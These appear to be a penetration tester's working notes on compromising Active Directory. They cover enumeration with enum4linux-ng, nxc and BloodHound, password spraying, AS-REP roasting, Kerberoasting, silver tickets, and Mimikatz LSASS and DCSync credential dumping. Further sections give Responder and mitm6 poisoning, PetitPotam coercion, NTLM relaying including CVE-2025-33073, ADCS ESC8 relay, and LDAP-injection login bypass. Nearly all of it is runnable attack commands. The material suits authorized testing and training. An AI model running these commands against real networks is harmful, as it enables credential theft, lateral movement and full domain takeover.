Active Directory Exploitation

AD mindmap - https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg

Notes on tooling

Impacket has been a bit hit or miss with pip and packages and all
What’s worked has been installing impacket via python3 -m pipx install impacket
- However, tools using impacket as a library (like Petitpotam) will fail, since impacket isn’t installed as a pip library
- Thus, create a virtual environment just for pip
  - python3 -m venv pipenv, source pipenv/bin/activate, and pip install impacket
- Tools like petitpotam will now be able to reference the impacket library within the venv

Automatic Enumeration

Enum4Linux-ng

https://github.com/cddmp/enum4linux-ng
Performs a bunch of checks on multiple services, like RPC, LDAP, and SMB
Unauthenticated: enum4linux-ng {IP}
- Interesting options: -U for user enum, -o for OS info, -S for shares, -L for additional domain info (on DCs), -P for password policy info, -I for printer info
With credentials: enum4linux-ng -u {username} -p {password} -w {domain} {target_IP}
- Domain not usually necessary since it’ll figure it out
- -K {ticket_file} to auth using a Kerberos ticket (DNS must be set up)
- -H {NTHASH} to pass a hash
- --local-auth for local authentication

PingCastle

wget https://github.com/netwrix/pingcastle/releases/download/3.3.0.1/PingCastle_3.3.0.1.zip
Pingcastle.exe --healthcheck --server {domain} from the Windows side

NTLMRecon

NTLMRecon
Oftentimes, and especially with Kerberos auth, we need the FQDN of machines to authenticate to them
NTLMRecon will enumerate domain names, machine names, and so on
- ntlmrecon --input {IP_or_cidr_or_file} --outfile ntlmrecon.csv

Service Enumeration

SMB

Indicated by ports 139, 445
nxc smb {IP} -u '{domain}\{username}' -p {password}
- Some useful flags:
  - --shares for share enumeration, --rid-brute 3000 or --users for user enum, --pass-pol for password policy
  - --reg-sessions was a recent addition to query user sessions on a machine
  - -M for modules, like exploits and such
- Can also execute commands with -X 'powershell -e ...'
smbclient.py {ip} for an interactive SMB client
- list shares with shares and select a share with use {share_name}
- tree to recursively list files in the share
- Check inside SYSVOL policies/{guid}/machine/preferences/groups for a group policy password
  - If found, decode with gpp-decrypt
- To remove null bytes: tr -d '\000' < input_file > output_file
- If using Kerberos authentication, like a golden ticket, we need to pass computer names (FQDNs) and use -k
  - smbclient.py {FQDN} -k
  - Naturally, this requires DNS to be set up
We can also mount the file share locally with mount -t cifs //{IP}/{share} /mnt/{created_dir}
- If we need to specify a username/password, do so with options: -o username={username},password={password}

LDAP

Indicated by ports 389, 636
Checking for anonymous LDAP bind
- ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={TLD}"
- With credentials: ldapsearch -D '{user}@{user_domain}' -w '{user_password}' -H ldap://{IP} -b "dc={target_domain},dc={tld}"
- This can yield a ton of information, such as users on the system
  - ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={tld}" "(objectClass=person)" - More Hacktricks info
  - Users can have custom fields added, so check each user/group for passwords
    - | grep -iE "pass|pwd|secret|cred|auth|token|key"
    - If we find anonymous ldap bind, slowing down for 5-10 mins and just processing the entire output could be nice
- Checking lockout policy: -b "dc={target_domain},dc={tld}" -s sub "*" | grep lockoutThreshold
- Checking a specific user’s info: ldapsearch -x -H ldap://{dc_ip} -D '{owned_username}@{domain}' -W -b "DC={domain},DC={tld}" "(sAMAccountName={target})"
  - We can tell if the user is disabled by checking userAccountControl: 66050 - If we have permissions over the user, we can reenable their account with ldapmodify by setting userAccountControl to 66048:

ldapmodify -x -H ldap://{dc_ip} -D "{owned_username}@{domain}" -W << EOF
dn: CN={target_name_from_ldapsearch},CN=Users,DC={domain},DC={tld}
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF

LdapDomainDump - outputs to a pretty HTML page
- sudo ldapdomaindump ldaps://{IP} -u '{domain}\{username}' -p '{password}'
If a web server is running alongside an LDAP server, the web server might be using the LDAP server for authentication
- We can perform LDAP injection, putting * for the username or password, allowing us to log in with any user account

RPC

Indicated by ports 135, 593
Can get an RPC shell with rpcclient -U '{domain}/{username}' {IP}
- enumdomusers can get the domain users from within RPC, which we can then check again for preauth
- queryuser {username} to get user properties (passwords could be in descriptions)
  - Can also just querydispinfo
- Could also have a null session (basically allowing anonymous users to connect and query info)
  - enum4linux-ng will check for this, among much else
  - rpcclient -U "" {IP} -N

Exchange

Indicated by ports 110, 143, 587, 993, 995
Can enumerate machine information with ntlmrecon --input https://{exchange_endpoint}
Can run proxyshell_rce.py -u https://{exchange_endpoint} -e administrator@{domain} from an unauthed perspective
- PoC: https://github.com/dmaasland/proxyshell-poc
Can run poc_aug3.py {IP} {username} {password} {command}
- PoC: https://github.com/testanull/ProxyNotShell-PoC

Enumerating the Domain with BloodHound/SharpHound

Capturing the system data with SharpHound:

SharpHound
- If we can’t update kali’s bloodhound, Sharphound version 1.1.1 works with kali’s default 4.3.1 bloodhound (legacy)
Install on Windows system and unzip
- Invoke-WebRequest {url} -Outfile {outfile}; Expand-Archive {outfile}
- Use with Import-Module .\SharpHound.ps1
  - Invoke-BloodHound -CollectionMethod All -OutputDirectory {dir} -OutputPrefix {filename_prefix}
Look at misc notes for getting the file off of the system
Can also be run from kali
- It’s always better to run from a shell on the machine if possible, but from Kali works if we only have LDAP to work off of
- Newest version for BloodHound CE:
  - apt install bloodhound - installs latest BloodHound CE GUI
    - run GUI with bloodhound
  - pipx install bloodhound-ce - installs latest bloodhound-ce-python
    - run collection with bloodhound-ce-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -c all --zip -op {out_prefix} -ns {dc_ns_ip}
- Legacy version (for kali default):
  - nxc ldap {dc} -u {username} -p {password} --bloodhound --collection All --dns-server {dns_server_ip}
  - pipx install bloodhound
    - run collection with bloodhound-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -c all --zip -op {out_prefix}

Ensuring all data collection

If we have a domain forest situation, we’ll need to point bloodhound at the correct domain for information collection
This can be done with the -d and -dc flags, while specifying the domain of the user we own
- bloodhound-ce-python -u {user}@{source_domain} -p {password} (--hashes :{NT_HASH}) -d {target_domain} -dc {target_domain_server_name} -c all --zip -op {out_prefix}
Will authenticate via LDAP to query the information, so it requires a successful external bind

Analyzing the data with BloodHound

Use neo4j on kali machine - sudo neo4j start
- If not installed, just run neo4j and install the suggested option
- Go to localhost:7474 in the browser, set a new password
Now we can run bloodhound
- Sign in with new password set
- Upload the SharpHound zip folder using button on right
This will show all data collected AS THE CURRENT USER
- It will have no idea if other users have local admin access on other workstations, only current user
Analysis
- To perform analysis on newer versions of BloodHound CE, click the file browse button next to the Cypher query
Queries:
- All computers: MATCH (m:Computer) RETURN m
- All users: MATCH (m:User) RETURN m
- Active sessions: MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
- Get all hostnames (for massive internal networks): ./cypher-shell -u neo4j -p {password} 'MATCH (c:Computer) WHERE toLower(c.name) ENDS WITH ".example.domain.tld" RETURN c.name' --format plain | tee hostnames.txt
Interesting paths:
1. Paths to high value targets from owner users (or even paths to other users)
2. Outbound object control of common groups
3. Find Workstations where Domain Users can RDP
4. Find Servers where Domain Users can RDP
5. Find Computers where Domain Users are Local Admin
6. Shortest Path to Domain Admins from Owned Principals
7. List Kerberoastable users
8. User SPNs (what can certain users access)

Password Attacks

Cached Credentials

Password hashes stored in Local Security Authority Subsystem Service (LSASS)
Basically just use Mimikatz as before
- privilege::debug gives us the SeDebugPrivilege to run below commands
- token::elevate to elevate to SYSTEM user
- lsadump::sam will dump NTLM hashes of local users
- sekurlsa::logonpasswords will look for clear-text passwords, dump NTLM hashes (including domain users), and dump Kerberos tickets
- sekurlsa::tickets will show tickets stored in memory
  - We want to steal TGT more than a TGS for overall service access (rather than just one)
Public Key Infrastructure (PKI)
- Part of the Active Directory Certificate Service (AD CS), which implements PKI to exchange digital certs between authenticated users and trusted resources
- Certificate Authority (CA) servers can grant/revoke certificates
  - The private keys used are usually non-exportable, but Mimikatz’s crypto::capi and crypto::cng can take care of that

Password Spraying

Avoiding lockout - net accounts will show authentication lockout information
Using Spray-Passwords.ps1 for password enumeration on Windows side
- .\Spray-Passwords.ps1 -Pass Nexus123! -Admins
SMB password spraying
- nxc smb {IP_with_smb} -u users.txt -p passwords.txt -d {domain} --continue-on-success
  - This will also show whether the user is an administrator - SMB hash spraying with nxc smb {IP} -u {users.txt} -H {hashes.txt}
Obtaining TGTs
- Use kerbrute - .\kerbrute_windows_amd64.exe passwordspray -d {domain} .\usernames.txt "{password}"
- AS-REP Roasting without credentials, described below

AS-REP Roasting

Requires that Kerberos preauth is disabled, which prevents sending an AS-REQ on behalf of any user
Performing hash cracking after receiving the AS-REP from the KDC
Performed with impacket-GetNPUsers on kali side
- impacket-GetNPUsers -dc-ip {dc} -request -outputfile hashes.asreproast {domain}/{username} (alongside password)
  - With users.txt: impacket-GetNPUsers {domain}/ -no-pass -usersfile users.txt -dc-ip {IP} | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
- Hashes can be cracked with Hashcat’s 18200
Performed with Rubeus on Windows side
- .\Rubeus.exe asreproast /nowrap
This can also be done without a password to find users who don’t have Kerberos pre-auth
- impacket-GetNPUsers -dc-ip {IP} {domain}/
- These users don’t require a password to grab the TGT hash
CVE-2022-33679 - exploiting RC4 keys
- MITM exploit to downgrade a client’s encryption to RC4-md4 cypher, then cracking cypher’s key
- Doesn’t require authentication, but does require a lack of Kerberos preauth on target account
- Exploit: https://github.com/Bdenneu/CVE-2022-33679/tree/main
  - CVE-2022-33679.py {domain}/{user} {target_IP}

Kerberoasting

Cracking the password of the service account by using the encrypted SPN password hash used on the service ticket
Can use impacket-GetUserSPNs if remote with creds
- impacket-GetUserSPNs {domain}/{user}:{password} -dc-ip {IP} -request
- If we get an error along the lines of clock skew being too great, we can run timedatectl set-ntp off and rdate -n {dc_ip} to sync
Can use Rubeus again if local
- .\Rubeus.exe kerberoast /outfile:hash.txt
Can crack with Hashcat’s 13100 mode

Silver Tickets

Forging our own service tickets via a password hash that should only be known to the DC and service account
- This requires that Privileged Account Certificate (PAC) be disabled, which it often is
To create the ticket, we need:
- SPN password hash - can use sekurlsa::logonpasswords on machine with established session with application (usually(?) current machine)
- Domain SID - whoami /user minus the last number (user RID) - Alternatively, wmic useraccount where name='{account_name}'
- Target SPN - basically just the DNS host name and the protocol (like HTTP)
Performed using mimikatz
- Don’t escalate privileges to system
- kerberos::golden /sid:{sid} /domain:{domain} /ptt /target:{server_name} /service:{service_protocol_like_http} /rc4:{NTLM_hash} /user:{any_domain_user}
  - ptt allows us to inject forged ticket into memory of target machine
Then, we should be able to access the service. For example, iwr -UseDefaultCredentials {protocol}://{server_name} to view a webserver

Poisoning, Coercing, and Relaying

Poisoning

Poisoning is often your best friend on internals
- Responder
  - Run sudo responder -I {network_interface} to respond to dns queries and host servers to capture the authentication sent
    - Can try to crack NTLMv2 hash
    - Can also relay it onwards to a server that doesn’t have SMB signing
      - If done, make sure to disable responder’s SMB and HTTP servers in /etc/responder/Responder.conf, as we no longer want to be the server receiving the auth
- Mitm6
  - Windows prefers IPv6 to IPv4 by default, and will send out IPv6 configuration requests regularly
  - mitm6 responds to these requests and can work with ntlmrelayx
    - Need -6 option with ntlmrelayx so it will listen for IPv6
    - This can be dangerous as it doesn’t necessarily intercept requests that are going to fail (like Responder intercepting a misspelled DNS request)
  - mitm6 -d {domain}
    - Doesn’t need an interface as the tool will automatically detect which interface to listen on

Coercing

Can check for available coercion methods with nxc smb {IP} -M coerce_plus -o LISTENER={kali_IP}
- This is better with credentials; can check for more methods (-u {domain}\{user} and -p {password})
Petitpotam
- Uses EfsRpcOpenFileRaw to convince the DC to open a file at \\attacker_share\share, thus causing the DC to authenticate to us
- We can capture the credential using impacket’s smbserver to try and crack it, but this is pretty unlikely to work due to the randomized passwords
  - smbserver.py loot $(pwd) -smb2support will host a share on our IP called loot
  - Instead, we should relay it on with impacket’s ntlmrelayx or certipy
- Sometimes it won’t work for unauthenticated users, thus -u {user} -p {password} -d {domain} can be used
Coercer
- https://github.com/p0dalirius/Coercer
  - sudo apt install coercer
- A useful tool which convinces Windows servers to authenticate somewhere using 12 methods
  - Usage: coercer coerce -u {domain_user} -p {password} -d {domain} -t {coercion_target_domain_IP} -l {listener_IP} --always-continue
- This can come in very handy when we’ve already rooted one server and want to pivot, as we can use something like Rubeus to extract tickets from memory
  - Thus, we’d specify -l as the server we own

Relaying

If the credentials can’t be cracked, pair responder up with ntlmrelayx
- ntlmrelayx.py -t {protocol_like_ldaps}://{target_ip} -socks
  - smb can be used against servers that don’t have signing:
    - ntlmrelayx.py -tf {smb_no_signing_ips} -socks
  - -socks will create a socks proxy to forward traffic along using the captured authentication
    - Thus, we add socks4 127.0.0.1 1080 to /etc/proxychains4.conf and then can run commands as though we had a powershell session as the user
      - For example, we can run secretsdump.py -no-pass where normally a password would need to be specified
  - -c "{command}" will execute a command as the user, whereas --interactive can drop us into a shell on the respective protocol (SMB/LDAP/SQL)
    - After starting an interactive shell, it’ll start up a service on localhost, which we can just nc to
  - Use --remove-mic with LDAP to downgrade NTLM’s Message Integrity Check (aka to relay SMB info to an open LDAP port)
  - -6 for listening for IPv6 with mitm6
  - --keep-relaying will continue to relay to all targets even if we’ve already tried one hash on them
    - This can come in very handy when there are multiple hashes found by responder (especially if one is much more rare)
  - --add-computer {name} {password} will attempt to add a new computer via SMB/LDAP --delegate-access will provide the target computer with delegation access to the the computer specified
Kerberos relay with krbrelayx.py
- https://github.com/dirkjanm/krbrelayx
- Not like traditional relaying, since tickets and service keys are cryptographically bound together
- If a user has unconstrained delegation, we can use this to pivot
  - A client authenticating to a service with unconstrained delegation allows forwarding of the full TGT, meaning we can impersonate the user to any other service
- Abuse workflow (outlined here)
Abuse machines solely with SMB signing disabled (or even with signing enabled!)
- Recent CVE, CVE-2025-33073, with exploitation detailed in this blog post
- We can spoof as a certain type of DNS record, coerce the machine to authenticate to that DNS name, and then relay that authentication back to the original computer (which will actually accept it due to thinking the DNS record is itself, even though it’s not where it resolves)
  - pretender -i "{network_interface}" --spoof "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" --no-dhcp-dns --no-timestamps
    - Can also use responder
  - coercer coerce -t BRAAVOS.ESSOS.LOCAL -l localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -u {domain_user} -p {password} -d {domain}
  - ntlmrelayx.py -t BRAAVOS.ESSOS.LOCAL -smb2support
    - We also don’t have to relay to SMB, we can use other protocols (winrms, mssql, ESC8 attack) if SMB signing is disabled
    - ntlmrelayx.py -t winrms://BRAAVOS.ESSOS.LOCAL -smb2support
      - As of September 2025, this requires Ipmacket’s 0.13.0 dev, which can be installed by cloning the repo and pip install . inside a venv
- If we can’t do name resolution poisoning, we should attempt to add a DNS record on the machine itself
  - python3 dnstool.py -u '{domain}\{user}' -p {password} {target_ip} -a add -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d {kali_IP}

Getting execution with credentials or hashes

Shells:
- 135 - use wmiexec.py -hashes :{hash} '{domain}/{user}@{ip}'
- 139/445 - use psexec.py -hashes :{hash} '{domain}/{user}@{ip}' or smbexec.py
- 593 - use atexec.py -hashes :{hash} '{domain}/{user}@{ip}' "{command}"
- 3389 - user xfreerdp3 /u:{user} /d:{domain} /pth:{hash} /v:{IP}
  - /p:{password} if we have it
- 5985 - use evil-winrm -i {IP} -u '{domain}\{username}' -H {hash}
  - -r {domain} optional, used for kerberos

ADCS

ESC 1-16 breakdown with exploitation steps
- Follow these steps to a TEE. It might say “optional” or something, but just do it, it can be finnicky
Certify
- Run on the Windows side
- https://github.com/GhostPack/Certify
  - Requires compilation, unless we want to use https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/dotnet%20v4.8.1%20compiled%20binaries/Certify.exe
- Certify.exe find /vulnerable
certipy
- certipy find -u {user}@{domain} -p {password} (-hashes {nthash}) -dc-ip {dc_ip} -text
  - Use -vulnerable to cut the output down a bit
- This will identify if any certificate authorities are vulnerable to ESC1 through ESC16
  - If they are, refer to Orange Cyberdefense’s mindmap for exploitation details on each
- Use templates from these CAs that have Enabled True and Client Authentication True
- ESC8 relay example:
  - python PetitPotam.py {kali_IP} {coercable_DC_IP} to get a different DC to authenticate to us
  - Use ntlmrelayx.py -t http://{target_DC_IP}/certsrv/certfnsh.asp -smb2support --adcs --template '{vuln_template_name}' to relay the auth to the target
    - --template just specifies the template name we’re user from the vulnerable CA
- Update a user’s userPrincipalName (upn): certipy account -u "{user}@{domain}" -p {password} -dc-ip {dc_ip} -user '{user_to_check}' -upn '{upn_to_update_to}' update
- Get shadow credentials for a user: certipy shadow -u "{user}@{domain}" -p {password} -dc-ip {dc_ip} -account '{target_user}' auto
- Request a TGT for a user: certipy req -k -dc-ip {dc_ip} -target '{DC_fqdn}' -ca '{CA_name_from_certipy}' -template 'User'
  - Alternatively, we can use impacket’s getTGT.py with getTGT.py '{domain}/{user}:{password}' -dc-ip {dc_ip}
- Auth with pfx (TGT): certipy auth -pfx '{pfx_file}' -dc-ip '{dc_ip}' -domain '{domain}'
  - If this fails due to “Certificate is not valid for client authentication”, we can use -ldap-shell for an LDAP shell instead
    - This will occur due to some templates not including Client Authentication in its EKUs (Extended Key Usage), such as a Webserver template

SCCM

Recon

sccmhunter.py find -u {username} -p {password} -d {domain} -dc-ip {dc_ip} -debug
- Also worth running nxc smb on the sccm server: nxc smb {sccm_ip} -u {username} -p {password} -d {domain} --shares
pxethief.py 2 {sccm_ip} can also yield results

Exploitation

Not much experience here, but refer to Orange Cyberdefense’s mindmap
Based on the credential level access we have, we can perform a number of different attacks

Post Exploitation

Check out AD Pivoting notes for info on what to do after owning a machine
check out Red Teaming for CCDC notes for persistence

Miscellaneous

Group3r is a good tool to auto-enum group policy misconfigs
Abusing Domain Controller Synchronization
- Sometimes there are multiple DCs across an environment for redundancy
  - These DCs use Directory Replication Service (DRS) to synchronize
  - DCs receiving requests for updates don’t check if the request came from a known DC and only verify that the SID has the correct privileges
    - This means that we just need a user with the correct privileges
    - Required privileges: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes in Filtered Set
      - Owned by Domain Admins, Enterprise Admins, and Administrators by default
    - If we have WriteDACL on the domain via a group, we can give ourselves the necessary permissions
- Performed with mimikatz on domain-joined machine
  - This gives us a way to get the hash of any domain user
  - lsadump::dcsync /user:{domain}\{user}
- Can also be performed with impacket-secretsdump on kali
  - impacket-secretsdump -just-dc-user {target_domain_user} {domain}/{admin_username}:"{password}"@{DC_IP}
  - impacket-secretsdump -hashes :{NTLM_hash} {domain}/{user}@{DC_IP}

UAC Fatigue

If we can get a high-privileged user to enter their credentials in a UAC prompt on a box we own, we can dump LSASS for their creds
Requires:
- Local admin on a box
- Active high privilege user on the box
- Disabled all local admins (to prevent authentication using a local admin)
Then just run a file that requires UAC as their user